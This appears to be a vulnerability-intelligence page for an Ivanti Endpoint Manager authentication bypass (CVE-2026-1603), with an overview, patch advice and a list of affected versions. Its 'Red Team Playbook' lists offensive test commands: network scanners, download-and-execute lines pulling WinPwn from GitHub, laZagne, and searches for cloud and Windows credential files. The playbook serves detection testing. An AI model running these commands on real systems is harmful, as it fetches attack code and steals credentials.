CVE-2026-1603
Overview
This vulnerability is an authentication bypass in Ivanti Endpoint Manager versions prior to 2024 SU5. It stems from improper access control mechanisms within the RemoteControlAuth API, specifically the POST /RemoteControlAuth/api/Auth endpoint. The flaw allows unauthenticated remote actors to bypass normal authentication checks and access sensitive credential data stored by the application.
Vulnerability Description
An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allows a remote unauthenticated attacker to leak specific stored credential data.
Impact
An unauthenticated remote attacker can leverage this vulnerability to obtain stored credential data from the Ivanti Endpoint Manager system. This exposure can lead to compromise of sensitive information used for further attacks or lateral movement within an enterprise environment. No user interaction or valid credentials are required to exploit the flaw, increasing the attack surface and potential for unauthorized data disclosure affecting business confidentiality and security posture.
Solution
Ivanti has released a security advisory addressing this issue in the February 2026 update for Ivanti Endpoint Manager 2024. Users should upgrade to version 2024 SU5 or later as specified in the advisory available at https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024. Applying this update mitigates the authentication bypass by correcting access control validation. No additional workarounds are documented in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Ivanti Endpoint Manager is characterized by an authentication bypass that allows remote unauthenticated attackers to access sensitive stored credential data. This flaw arises from improper validation mechanisms within the software, which fail to enforce adequate authentication checks for specific endpoints. Attackers can exploit this weakness to gain unauthorized access to credential information, which could include usernames, passwords, and other sensitive data stored within the management system. The implications of this vulnerability are significant, particularly given the critical role that endpoint management solutions play in securing enterprise environments.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage network access to the Ivanti Endpoint Manager, potentially using tools to probe for weaknesses in the authentication process. Once the vulnerability is identified, the attacker can craft requests that bypass authentication, leading to the retrieval of sensitive credential data. This could be executed remotely, making it particularly dangerous as it does not require physical access to the network or systems. Scenarios may include targeted attacks against organizations that rely on Ivanti Endpoint Manager for managing endpoints, where attackers aim to harvest credentials for further infiltration or lateral movement within the network.
The real-world impact of this vulnerability can be profound. Organizations that utilize Ivanti Endpoint Manager are often managing a large number of endpoints, including servers, workstations, and mobile devices. The leakage of credential data can lead to unauthorized access to critical systems, resulting in data breaches, loss of intellectual property, and potential regulatory non-compliance. Furthermore, the financial implications can be severe, with costs associated with incident response, remediation, and potential legal liabilities. The reputational damage that follows a breach can also affect customer trust and business relationships, underscoring the importance of addressing such vulnerabilities promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and vulnerability scans should be conducted to identify and remediate weaknesses in the Ivanti Endpoint Manager deployment. Additionally, organizations should ensure they are running the latest version of the software, as updates often include patches for known vulnerabilities. Employing network segmentation can also help limit exposure, ensuring that only authorized personnel have access to sensitive management interfaces. Furthermore, implementing robust logging and monitoring practices can aid in detecting suspicious activities that may indicate exploitation attempts.
In conclusion, the authentication bypass vulnerability in Ivanti Endpoint Manager presents a significant risk to organizations that rely on this software for endpoint management. The ability for remote unauthenticated attackers to leak credential data poses serious threats to data security and organizational integrity. By understanding the technical details, potential attack vectors, and real-world implications of this vulnerability, organizations can take proactive measures to protect their environments. Through diligent detection and mitigation strategies, the risks associated with this vulnerability can be effectively managed, safeguarding sensitive information and maintaining trust in enterprise security practices.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2026-1603, reflected in a modest rise in telemetry signals and a corresponding uptick in the Exploit Prediction Scoring System (EPSS) score. While this escalation is not yet rapid or widespread, the trend indicates growing interest or opportunistic probing by threat actors targeting Ivanti Endpoint Manager environments. The incremental rise in detection frequency suggests that adversaries may be conducting more reconnaissance or limited exploitation attempts, potentially aiming to harvest stored credentials remotely without authentication. Although no new exploit techniques or ransomware affiliations have surfaced, the increased EPSS score and detection trend elevate the urgency for defenders to maintain vigilance. This subtle shift in the threat landscape underscores a heightened risk posture, warranting continued monitoring as the vulnerability remains a viable vector for credential leakage that could facilitate broader compromise within affected networks.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Endpoint Manager | All |
cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:su4:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:su4_security_release_1:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-1603 |
| hub.ivanti.com |
GitHub CVE
|
https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024?language=en_US |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-1603 |